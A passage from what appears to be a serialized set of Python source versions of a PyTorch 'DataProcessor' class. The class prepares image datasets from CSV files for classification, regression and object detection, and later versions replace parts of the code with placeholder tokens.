not self.multi_label:\n self.minorities, self.class_diffs = 
get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 
0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, 
split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), 
onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop 
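The one_hot() helper used by the multi-label branch above is ablated here; what the caller relies on is a multi-hot matrix plus the discovered class vocabulary. A stand-in with that contract (the multi_label flag is accepted but unused in this simplified version):

import numpy as np

def one_hot(split_targets, multi_label=True):
    # split_targets: list of per-sample label lists -> (multi-hot array, classes)
    classes = sorted({c for row in split_targets for c in row})
    idx = {c: i for i, c in enumerate(classes)}
    out = np.zeros((len(split_targets), len(classes)), dtype=np.float32)
    for r, row in enumerate(split_targets):
        out[r, [idx[c] for c in row]] = 1.0
    return out, np.array(classes)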
in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', 
size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, 
onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + 
'.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = 
self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n <function token>\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() 